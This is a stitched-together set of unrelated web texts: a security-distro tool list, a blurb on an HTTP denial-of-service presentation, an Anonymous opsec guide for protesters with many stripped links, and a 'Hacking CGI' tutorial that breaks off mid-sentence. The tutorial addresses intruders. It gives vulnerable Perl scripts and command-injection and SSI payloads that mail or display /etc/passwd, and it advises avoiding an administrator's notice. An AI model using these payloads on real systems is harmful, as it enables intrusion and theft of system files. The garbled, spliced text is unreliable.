STD is meant to be used by both novice and professional security personnel but is not ideal for the Linux uninitiated. STD assumes you know the basics of Linux as most of your work will be done from the command line. If you are completely new to Linux, it’s best you start with another live Distro like Knoppix to practice the basics.


Tools are grouped as follows:


  • freeradius 0.9.3 : GPL RADIUS server


  • 2c2 : multiple plaintext -> one ciphertext
  • 4c : as with 2c2 (think plausible deniability)
  • acfe : traditional cryptanalysis (like Vigenere)
  • cryptcat : netcat + encryption
  • gifshuffle : stego tool for gif images
  • gpg 1.2.3 : GNU Privacy Guard
  • ike-scan : VPN fingerprinting
  • mp3stego : stego tool for mp3
  • openssl 0.9.7c
  • outguess : stego tool
  • stegbreak : brute-force stego’ed JPG
  • stegdetect : discover stego’ed JPG
  • sslwrap : SSL wrapper
  • stunnel : SSL wrapper
  • super-freeSWAN 1.99.8 : kernel IPSEC support
  • texto : make gpg ascii-armour look like weird English
  • xor-analyze : another “intro to crytanalysis” tool


  • sleuthkit 1.66 : extensions to The Coroner’s Toolkit forensic toolbox.
  • autopsy 1.75 : Web front-end to TASK. Evidence Locker defaults to /mnt/evidence
  • biew : binary viewer
  • bsed : binary stream editor
  • consh : logged shell (from F.I.R.E.)
  • coreography : analyze core files
  • dcfldd : US DoD Computer Forensics Lab version of dd
  • fenris : code debugging, tracing, decompiling, reverse engineering tool
  • fatback : Undelete FAT files
  • foremost : recover specific file types from disk images (like all JPG files)
  • ftimes : system baseline tool (be proactive)
  • galleta : recover Internet Explorer cookies
  • hashdig : dig through hash databases
  • hdb : java decompiler
  • mac-robber : TCT’s graverobber written in C
  • md5deep : run md5 against multiple files/directories
  • memfetch : force a memory dump
  • pasco : browse IE index.dat
  • photorec : grab files from digital cameras
  • readdbx : convert Outlook Express .dbx files to mbox format
  • readoe : convert entire Outlook Express .directory to mbox format
  • rifiuti : browse Windows Recycle Bin INFO2 files
  • secure_delete : securely delete files, swap, memory….
  • testdisk : test and recover lost partitions
  • wipe : wipe a partition securely. good for prep’ing a partition for dd
  • and other typical system tools used for forensics (dd, lsof, strings, grep, etc.)


  • blockall : script to block all inbound TCP (excepting localhost)
  • flushall : flush all firewall rules
  • firestarter : quick way to a firewall
  • firewalk : map a firewall’s rulebase
  • floppyfw : turn a floppy into a firewall
  • fwlogwatch : monitor firewall logs
  • iptables 1.2.8
  • gtk-iptables : GUI front-end
  • shorewall 1.4.8-RC1 : iptables based package


  • honeyd 0.7
  • labrea : tarpit (slow to a crawl) worms and port scanners
  • thp : tiny honeypot


  • snort 2.1.0: everyone’s favorite networks IDS
  • ACID : snort web frontend
  • barnyard : fast snort log processor
  • oinkmaster : keep your snort rules up to date
  • hogwash : access control based on snort sigs
  • bro : network IDS
  • prelude : network and host IDS
  • WIDZ : wireless IDS, ap and probe monitor
  • aide : host baseline tool, tripwire-esque
  • logsnorter : log monitor
  • swatch : monitor any file, oh like say syslog
  • sha1sum
  • md5sum
  • syslogd

network utilities

  • LinNeighboorhood : browse SMB networks like windows network neighborhood
  • argus : network auditor
  • arpwatch : keep track of the MACs on your wire
  • cdpr : cisco discovery protocol reporter
  • cheops : snmp, network discovery and monitor tool
  • etherape : network monitor and visualization tool
  • iperf : measure IP performance
  • ipsc : IP subnet calculator
  • iptraf : network monitor
  • mrtg : multi router traffic grapher
  • mtr : traceroute tool
  • ntop 2.1.0 : network top, protocol analyzer
  • rrdtool : round robin database
  • samba : opensource SMB support
  • tcptrack : track existing connections

password tools

  • john 1.6.34 : John the Ripper password cracker
  • allwords2 : CERIAS’s 27MB English dictionary
  • chntpw : reset passwords on a Windows box (including Administrator)
  • cisilia : distributed password cracker
  • cmospwd : find local CMOS password
  • djohn : distributed John the Ripper
  • pwl9x : crack Win9x password files
  • rcrack : rainbow crack


  • apache
  • ircd-hybrid
  • samba
  • smail
  • sshd
  • vnc
  • net-snmp
  • tftpd
  • xinetd

packet sniffers

  • aimSniff : sniff AIM traffic
  • driftnet : sniffs for images
  • dsniff : sniffs for cleartext passwords (thanks Dug)
  • ethereal 0.10.0 : the standard. includes tethereal
  • ettercap 0.6.b : sniff on a switched network and more.
  • filesnarf : grab files out of NFS traffic
  • mailsnarf : sniff smtp/pop traffic
  • msgsnarf : sniff aol-im, msn, yahoo-im, irc, icq traffic
  • ngrep : network grep, a sniffer with grep filter capabilities
  • tcpdump : the core of it all
  • urlsnarf : log all urls visited on the wire
  • webspy : mirror all urls visited by a host in your local browser

tcp tools

  • arpfetch : fetch MAC
  • arping : ping by MAC
  • arpspoof : spoof arp
  • arpwatch : montior MAC addresses on the wire
  • despoof : detect spoofed packets via TTL measurement
  • excalibur : packet generator
  • file2cable : replay a packet capture
  • fragroute : packet fragmentation tool (thanks again Dug)
  • gspoof : packet generator
  • hopfake : spoof hopcount replies
  • hunt : tcp hijacker
  • ipmagic : packet generator
  • lcrzoex : suite of tcp tools
  • macof : flood a switch with MACs
  • packetto : Dan Kaminsky’s suite of tools (includes 1.10 and 2.0pre3)
  • netsed : insert and replace strings in live traffic
  • packETH : packet generator
  • tcpkill : die tcp, die!
  • tcpreplay : replay packet captures


  • cryptcat : encrypted netcat
  • httptunnel : tunnel data over http
  • icmpshell : tunnel data over icmp
  • netcat : the incomparable tcp swiss army knife
  • shadyshell : tunnel data over udp
  • stegtunnel : hide data in TCP/IP headers
  • tcpstatflow : detect data tunnels
  • tiny shell : small encrypted shell

vulnerability assessment

Way too many to list them all. There’s much from THC, ADM, RFP, NMRC, TESO, Phenoelit. Be very careful with these tools. Remember, no guarantees are offered and you are entirely responsible for your own actions.

  • ADM tools : like ADM-smb and ADMkillDNS
  • amap 4.5 : maps applications running on remote hosts
  • IRPAS : Internet Routing Protocol Attack Suite
  • chkrootkit 0.43 : look for rootkits
  • clamAV : virus scanner. update your signatures live with freshclam
  • curl : commandline utility for transferring anything with a URL
  • exodus : web application auditor
  • ffp : fuzzy fingerprinter for encrypted connections
  • firewalk : map a firewall rulebase
  • hydra : brute force tool
  • nbtscan : scan SMB networks
  • ncpquery : scan NetWare servers
  • nessus 2.0.9 : vulnerability scanner. update your plugins live with nessus-update-plugins
  • nikto : CGI scanner
  • nmap 3.48 : the standard in host/port enumeration
  • p0f : passive OS fingerprinter
  • proxychains: chain together multiple proxy servers
  • rpcinfo : hmmmm…. info from RPC?
  • screamingCobra : CGI scanner
  • siege : http testing and benchmarking utility
  • sil : tiny banner grabber
  • snot : replay snort rules back onto the wire. test your ids/incidence response/etc.
  • syslog_deluxe : spoof syslog messages
  • thcrut : THC’s “r you there?” network mapper
  • vmap : maps application versions
  • warscan : exploit automation tool
  • xprobe2 : uses ICMP for fingerprinting
  • yaph : yet another proxy hunter
  • zz : zombie zapper kills DDoS zombies

wireless tools

  • airsnarf : rogue AP setup utility
  • airsnort : sniff, find, crack 802.11b
  • airtraf : 802.11b network performance analyzer
  • gpsdrive : use GPS and maps
  • kismet 3.0.1 : for 802.11 what else do you need?
  • kismet-log-viewer : manage your kismet logs
  • macchanger : change your MAC address
  • wellenreiter : 802.11b discovery and auditing
  • patched orinoco drivers : automatic (no scripts necessary)

Link to STD 0.1 download page: from where you can explore the rest of the site.



R-U-Dead-Yet? – Universal HTTP Denial-of-Service

This isn’t a R.U.D.Y script, (although A(A)A do have something in development) but a Power Point presentation by Hybrid Security that briefly explains R-U-Dead-Yet?, (aka R.U.D.Y) and compares it to Slowloris.


Download link:




Anonymous – the uber-secret handbook
compiled by AnonymiiVersion 0.2.0Date 20. February 2011
DRAFT VERSION,contains Typoscontains <°-(-(-(-<contains no ( o ) ( o )also, no 8====Dalso, tl;dr
Summary for the impatient
Anonymous ­ An Introductory Guide to Safety during Social Instability ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Foreword [fwd1]­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Political activists, dissidents, and even nonpartisan bystanders caught in social instability are often fearful fortheir protection and protection of their families. Citizens may face harsh and even violent opposition by authorities and security forces in such situations. This guide is designed to introduce the reader to the mentality needed to stay safe during unrest and protests ­ both online and offline. It furthermore aims to assist incontinued communications during periods of internet and phone line restrictions.­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­
Personal Safety
Physical Safety
Internet Safety
Internet Security
Tor Onion Router
Additional Information
Temporary Emails
­­­Firefox Plugins
­­­Care Package
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­The first section of this article will focus on personal safety. Personal safety can be spoken of in two differentspheres: Physical Safety and Internet Safety. It is important to remember that these two spheres overlap: a lapseof internet safety could lead to physical identification. However, by keeping in mind a few important rules youcan drastically reduce the chance of being singled out and identified.The second section of this article will go into specifics regarding technology that can be used to communicateanonymously, maintain secrecy, and protest effectively.
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­*** Personal Safety
***­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Physical Safety
The key to physical safety is to act normal so as not to draw undue attention to yourself and to not revealidentifying information to anyone. Important steps in achieving this can be separated into two lists: The Do List,and The Do Not List. These steps are especially important if you are an activist, as this puts you at more of a risk to start with.The Do List:­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ Blend in with crowds. Disperse into streams of people. Keep a low profile. Keep up to date on the news, especially protest rallying points and security checkpoints or roadblocks+Look for signs of plainclothes police in your presence. Cover anything that could be used to identify you such as tattoos or scars. If you come into contact with anonymous materials or protest guides, try to get them to protesters ­ they contain key safety information.
Additional Do’s for Protesters:­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­+Establish secure means to communicate with other protesters+Plan your protest point, escape plan, and regrouping point before attending a protest+Make backup plans ­ not just one, but many +Search for communications by Anonymous and Telecomix ­ read “Communications”+Try to obtain Anonymous’ Riot Guide for homemade gas mask instructions, advanced coordination strategies,etc.The Do Not List:­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­+Do not trust anyone to be who they say they are+Do not give any personal information that could be used to identify you to anyone+Do not mention anything about relationships, family, or relatives+Do not mention ties to activist groups+Do not mention the group Anonymous to anyone you do not know+Do not mention anything about your past ­ education, employment, etc.
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Internet Safety
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Any use of the internet could potentially be used to physically locate you. It is important not to revealinformation on the internet. If you are doing anything controversial online ­ such as discussing protests orblogging ­ you must be sure to conceal your IP. Please refer to the section on “Internet Security.”The Do List­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­: Keep in mind that any interaction you have online may be seen by others. Think about actions before you make them ­ do not say anything that you may regret, as it could be recorded. Create unique and secure usernames and passwords ­ Use letters, numbers, and special characters. Use a VPN if at all possible ­ see “Internet Security”. Delete your history, cookies, and cache after each internet session. Use Private Mode browsing whenever possible. Try using clients like Firefox instead of Internet Explorer. Use temporary or throw away e­mail accounts to create facebook accounts, etc. Use Firefox plugins for added security. See The Do Not List­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­: Do not use any or all of your actual name in account and usernames. Do not mention anything that could be personally identifying ­ see “Physical Safety”. Do not mention time zones. Do not mention physical characteristics or abilities.
Do not mention relationships, family, or relatives. Do not connect/disconnect from services such as Twitter and Facebook all at once ­ stagger your access so they can’t be connected­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­*** Internet Security  ***­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Each online device has an ‘IP Address.’ An IP can be used to help physically locate an individual. For this reason,it is important to hide your IP. There are many ways of doing this. You should use as many layers of security aspossible at any given time to increase your protection. Prepare internet security methods ahead of time in caseinternet restrictions are enforced suddenly. The three primary methods that will be discussed in this article areVPNs, I2P, and proxies.­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Virtual Private Networks ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­A Virtual Private Network, or VPN, is a method of securing information communicated over the internet. Whenchoosing a VPN service, try to pick a service from a country that will not easily hand over your privateinformation. For example, services from Iceland or Sweden would be much safer than a service from the USA. Also try to find a service that does not keep user logs or payment information [if using a paid service].Guides to installing the OpenVPN client:­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­* Windows: * Linux (Debian flavoured): * Mac:
Free VPN Services:
Commercial VPN Services:
* http://perfect­
Free VPN Downloads:
HotspotShield ­
UltraVPN ­­install.exe
Ultra VPN ­
UltraVPN ­
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­I2P is an anonymizing network that supports many secure applications. We recommend using pchat to connect and joining channels such as #anonops and #oplibya
I2P Websites­­­­­­­­­­­­­­­­­­­­
* http://i2p2.deI2P Tutorial for Windows Video­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­
* Tutorial for Linux Video
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­* I2P sites
­­­­­­­­­­­­­­­­­­­­­­­­­* http://inr.i2pI2P Port Usage­­­­­­­­­­­­­­­­­­­­­­­­­
* See also your router’s configuration.
I2P Installation and Running on Linux
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­* Download and extract the installation files, no need for separate install (such as apt­get install).* Run the router from /i2p folder with <tt>sudo sh i2prouter start</tt>. In seconds, I2P should open aKonqueror­browser page of I2P­main console.* Configure your bandwith settings. You might also consider opening some ports on your firewall for optimisingthe use of your bandwith.
Portable I2P (Windows Only)­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­
* http://portable­
­Contains I2P, several plugins, preconfigured browser, preconfigured IRC client and messenger.­Before you can use anything on I2P, you have to start the I2P router from the portableapps tray icon­menuwith the button ”I2P Launcher”.
Anonymous surfing with I2P
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­* Go to your browser options or preferences (depending on your browser) ­> ”network/connection settings”
* Select ”manual proxy configuration”
* In ”http” insert , for ”port” insert 4444
* In ”https” insert , for ”port” insert 4445
Make sure that you have No Proxy set for ”localhost,” so you’ll be able to reach your I2P configurationpage. To test your anonymity, go eg. to:
Proxies are intermediary connections that may help hide your IP.  They do not encrypt data. They may also helpin accessing restricted web sites. Use them with VPN services to increase VPN security. See the following sites:
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Tor Onion Router.
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Tor is a proxy network that helps hide your IP. It does NOT encrypt data. There have been some claims of specificcountries [such as Iran] circumventing Tor protection.
Download Tor­­­­­­­­­­­­­­­­­­­­­
* https://www.torproject.orgDownload TorButton for Firefox (Enable / Disable the Tor on the Browser)­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­
Tor is also included in the Anonymous care package.­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­
*** Communications
***­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Anonymous encourages citizens of protesting countries to ask for assistance. This is best done using IRC toconnect to #anonops. Please remember that it is safest to use a VPN [vpn8] or I2P [i2p9]. The IRC can be joined through
In the event of an internet shutdown, you can be sure that Anonymous and Telecomix will be trying diligently torestore communications. There are a number of things you can do to help.
*Try connecting to the internet at various locations ­ sometimes only certain ISPs shutdown while others remainoperational
*Try using dial­up connections if possible
*Find ham radio owners and scan for communications by groups such as Telecomix ­ they may be able to provideyou with directions for alternative internet connection methods.
*Locate universities and businesses with fax machines ­ we often try to use these machines as one­way communication devices to provide updates, safety guides, and inspirational material.
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­*** Additional Information
***­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Temporary / Throwaway Email Accounts [eml4]­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­E­mails can be set up quickly at the following sites:
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­** http://www.sofort­
* http://www.trash­*
An email provider with an emphasis on security can be found at: [not recommended, handsout data if Government demands it]
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Useful Plugins / Extensions for Firefox
* BetterPrivacy ­ Removes persistent cookies from flash stuff
* NoScript ­ blocks Javascript* Ghostery ­ Detects tracking pixels
* GoogleSharing ­ GoogleProxy for locations where Google is censored
* User Agent Switcher ­ Sends bogus browser identity to servers.
* Optimize Google ­ Removes information Google uses to track searches
* Outernet Explorer (MacOS) ­ Creates numerous searches to help prevent packet sniffing.
*­everywhere ­ Automatically loads https on a site if available.
* Scroogle SSL search (Google Anonymously):
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Anonymous Care Package
­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­Anonymous provides an often updated care package that contains useful guides and software. The best way toaccess it is to join an IRC channel and ask for it. The IRC may be accessed at and channels such as #anonops    [ /join #anonops ] may be of assistance. Please keep in mind security protocols such as the use of a VPN or I2P when accessing the IRC.
Social Threats
Basic rule: Blend in with the crowd, disperse into the stream. Keep a low profile. Don’t try to be special.Remember, when in Rome, do as Romans do. Don’t try to be a smart ass. FEDs are many, Anonymous is Legion, but you are only one. There are no heros only dead heros.
Do not give any personal information on the IRC chat as it is public, you mom could read what you write there and so could the Police.
And don’t mention your involvement with Anonymous in your real life.
•do not include personal information in your screen name
•don’t discuss personal information, your address or where you’re from
•don’t mention your gender, tattoos, scars, piercings, bodymodifications, over-/underweight, physical or psychological (in)abillities (got the idea?)
•don’t mention your profession or hobbies
•don’t mention whether you’re in a relationship
•don’t mention your involvement with other activist groups
•musical taste/preferred literature/films is a good way, to know someone,don’t mention any of these
•don’t use special characters, that are existent only in your language  as they would reveal where you are from
•don’t give even bogus info. Lot’s of no’s, make a yes.
•Everything is completely seperate between your real life and online

Hacking CGI



CGI programs are a major source of security holes. On a typical site the server

and config files may be secure, but if CGI programs are not meticulously

checked before they are used then serious security flaws can often be



If at any time you are having difficulty, see the Notes section near the bottom

of this document.


CGI basics


The letters “CGI” stand for “Common Gateway Interface”. CGI is a way to add

flexibility to websites by providing a mechanism for programs to be executed on

the server (sometimes with input from the user on the client-side), and for

their output to be displayed back to the client (or just logged somewhere on

the server for later inspection). These programs can be written in any

language, but by far the most common is perl. Perl is ideal for handling

text-based input easily, so it’s the language of choice for many CGI

developers. Usually the term “CGI script” actually refers to “perl script”.


What makes a CGI program dangerous?


There are, for example, several places where CGI programs are made available

for free. If you downloaded a set of perl scripts from a site such as this you

would probably expect them to be bug-free and install them without a second

thought. There are also the problems of time and operator competence. Most

people don’t have the time or the knowledge to go through a 5000-line bulletin

board script to find that single vulnerable statement. This isn’t just limited

to free scripts though. Some very high-profile professional script-packages

have recently been found to be vulnerable to attack.




If you know what script a site is using and it’s freely available, get it! By

examining the code and playing with it on your own system you’ll be able to

find holes a lot more easily than by just guessing. And your failed attempts

won’t be noticed by the server administrator.


Methods of attack


Insecure shell calls


This applies to CGI programs written in many languages, but most commonly perl.

If the program does not treat user input carefully there is a risk that a

malicious user may craft it to be processed by the program in a dangerous way.


Consider this example. The classic vulnerable “mail” script, for example a

feedback form. A website visitor is asked for comments that will be sent to the

webmaster’s email address by a script running on the server.


– vuln1.html – The submission form –


Thankyou for visiting my site. Please submit your comments and suggestions



<form action=”/cgi-bin/” method=”GET”>

<input type=”hidden” name=”address” value=””>

<textarea name=”comments” rows=10 cols=40></textarea>


<input type=”submit”>



– EOF –

– – The vulnerable perl script –


# Output will be an html page

print “Content-type: text/html\n\n”;


# Get input from form into the @pairs array

@pairs = split(/&/, $ENV{‘QUERY_STRING’});

# For each name/value pair in the array

foreach $pair (@pairs) {

# Split the pair into their own variables

($name, $value) = split(/=/, $pair);

# Convert the form-encoding back

$name =~ tr/+/ /;

$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(“C”, hex($1))/eg;

$value =~ tr/+/ /;

$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(“C”, hex($1))/eg;

# Store the destination email address and comments in variables

if ($name eq “address”) { # Store the destination email address

$address = $value;

} elsif ($name eq “comments”) { # Store the comments

$comments = $value;



# At this point $address holds the address specified on the form, and

# $comments holds the user’s comments.

# — “Active” part

# See discussion for details of this part

open(MAIL,”| /bin/mail $address”);

print MAIL “$comments”;


# — End of “active” part

# Print output for the user

print <<EOT;


Thanks for your comments :)



– EOF –


There are two files in the above example. The html file that takes the input

from the user, and the vulnerable perl script. If you don’t know perl then you

don’t need to try to understand how most of it works. Just know that the

destination email address (as specified by a hidden form element in the html

page) and the comments (from the textarea) are stored, and passed to the mail

program inside the “active” part.


In perl the open function is used to open a file, or more importantly here, a

pipe. In this case a pipe to the command “/bin/mail”

is opened and the comments are written to it, causing them to be emailed to the



Look at what’s happening here. The “/bin/mail” command

is produced by starting /bin/mail with the address specified by the html page.

If a malicious user was to save a copy of the html locally, and modify it by

changing the lines

<form action=”/cgi-bin/” method=”GET”>

<input type=”hidden” name=”address” value=””>

to these:

<form action=”” method=”GET”>

<input type=”hidden” name=”address” value=””>


The action must now contain the complete URL since the html no longer resides

on the server, and the email address has been replaced with your own. Now the

comments will be sent to your email address.


Now, what would happen if you were to change the email address part to this?

value=”;mail < /etc/passwd”

Inside the script this email address would translate to the command

“/bin/mail;mail < /etc/passwd”

causing the password file to be mailed to your address :)


(Note: I use /etc/passwd in examples throughout this document, but it is only

for example purposes. Nowadays this file has limited value to an intruder as

on modern systems the passwd file will not contain the actual password hashes).


If you find that the script filters the ; character, you can always try the

| character, or \n (a newline), as these both cause another command to be

executed in a line. Bear in mind that using | will cause the output of the

first command to be fed into the second (won’t usually matter), and that to

send a newline character over the web you must encode it as %0a. So the address

part could now be

value=” < /etc/passwd”

Insecure use of SSI


SSI means “Server Side Includes”. These are instructions that can be placed in

html files that are parsed by the server when the page is requested to give

on-the-fly information. These pages are normally given the extension .shtml (or

some shorter version), but this depends on the setup of the server. On some

servers, all html documents are parsed. All includes take the form


Here are some examples:

<!–#echo var=”DATE_GMT” –> Prints the current date

<!–#include virtual=”/ssi/header.html” –> Includes a common header section

<!–#exec cmd=”uptime” –> Displays the system’s uptime


There’s a lot more you can do with SSI – take a look around on the net for



If you could add your own SSI to a file that is parsed by the webserver, you

would be able to execute commands, include files, etc. Many CGI programs do not

take this into account. Here’s an example:


– vuln2.shtml – A public comments page –


<!–#include virtual=”/ssi/header.html” –>

Thankyou for visiting my site. Please submit your comments and suggestions



<form action=”/cgi-bin/” method=”GET”>

<textarea name=”comments” rows=10 cols=40></textarea>


<input type=”submit”>



Here’s what other people have had to say:



<!–#include virtual=”/ssi/footer.html” –>


– EOF –

– – The vulnerable perl script –


# Define the location of the page to be updated

# Change this to the location of vuln2.shtml if you’re trying this out

$pagename = “/home/web/html/vuln2.shtml”;

# Print content-type header

print “Content-type: text/html\n\n”;

# Get input from form into the @pairs array

@pairs = split(/&/, $ENV{‘QUERY_STRING’});

# For each name/value pair in the array

foreach $pair (@pairs) {

# Split the pair into their own variables

($name, $value) = split(/=/, $pair);

# Convert the form-encoding back

$name =~ tr/+/ /;

$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(“C”, hex($1))/eg;

$value =~ tr/+/ /;

$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack(“C”, hex($1))/eg;

# Store the comments in a variable

if ($name eq “comments”) { # Store the comments

$comments = $value;



# At this point $comments holds the user’s comments.

# Separate each comment in the output file

$comments .= “\n<hr>\n”;

# — “Active” part

# Open the file for read/write

open(FILE,”+<$pagename”) || (print(“Cannot open file!\n”) && exit);

# Lock the file to prevent other processes opening it

flock(FILE, 2);

# Read the file into the @list array

@list = <FILE>;

# Search through the array and insert the comments just before the

# <!–begin–> line

$linenum = 1;

foreach $line (@list) {

if ($line =~ /^<!–begin–>/) {


splice(@list, $linenum, 0, $comments);





# Write the array back to the file



foreach $line (@list) {

print FILE $line;


# Close the file


# — End “active” part

# Print output for the user

print <<EOT;


Thanks for your comments. Click <a href=”/vuln2.shtml”>here</a> to

return to the comments page :)



– EOF –


These two files comprise a simple guestbook. You can see that the .shtml file

uses SSI to display a common header and footer (using the include directive).

When this file is sent to the browser the include directives will be replaced

by the contents of the appropriate files. Note that the <!–begin–> in the

.shtml file is merely marking where the next comment should be inserted. It

should not be confused with an SSI directive, as these all start <!–#.


Since this is such a simple script it doesn’t do any input validation. If this

was a normal html page you would be able to insert html, including javascript,

into the page. Because it’s SSI-enabled, try entering something like the

following in the comments box:

<!–#exec cmd=”cat /etc/passwd” –>


Now, when you go back to the comments page you’ll see the password file :)


(Note: The file will appear to be one long line – this is simply because html

doesn’t insert line breaks at newlines. Use your browser’s “view source”

function to get a more readable output).


This is ideal. However, some server admins disable the exec directive to

prevent this type of attack. In this case the best you can do is use the

include directive to include the contents of a file whose location you know,

such as a password database file that is not available via the web with your

current access rights, but still within the web root. Note that some files

(such as CGI scripts) will not have their source included by using an include

directive. From an intruder’s point of view, the include directive has limited

value, and without exec there isn’t always much you can do.


Buffer overflow


This applies to CGI programs written in languages such as C. If the program

does not validate its input properly a malicious user could overflow a buffer

in the program to execute arbitrary code on the server. Since buffer overflows

are beyond the scope of this article I won’t go into any more detail, but

information on this kind of attack is available to anyone who searches for it.

A good article to read to get started with buffer overflows is “Smashing The

Stack For Fun And Profit” in Phrack 49. Look it up. :-)


What to do once you’re in


First of all, don’t pull an rm -Rf / . If you take note of anything I say, it

should be that damaging sites is lame. Other than that, you have to make the

decision whether what you’re about to do is reasonable or not. Remember, unless

you know what you’re doing (which you probably don’t since you’re reading this)

and you try anything stupid you’ll get caught. One thing you might want to do

is report the vulnerability. Mail the server admin and let them know – if

they’re a reasonable person they’ll fix the hole, and you’ll make a new friend

:-) If the hole is in a widely-distributed CGI program, report it to the

creators so that it can be fixed for future versions, and current users can be



Presumably you’re trying to break into the site for a reason – to get access to

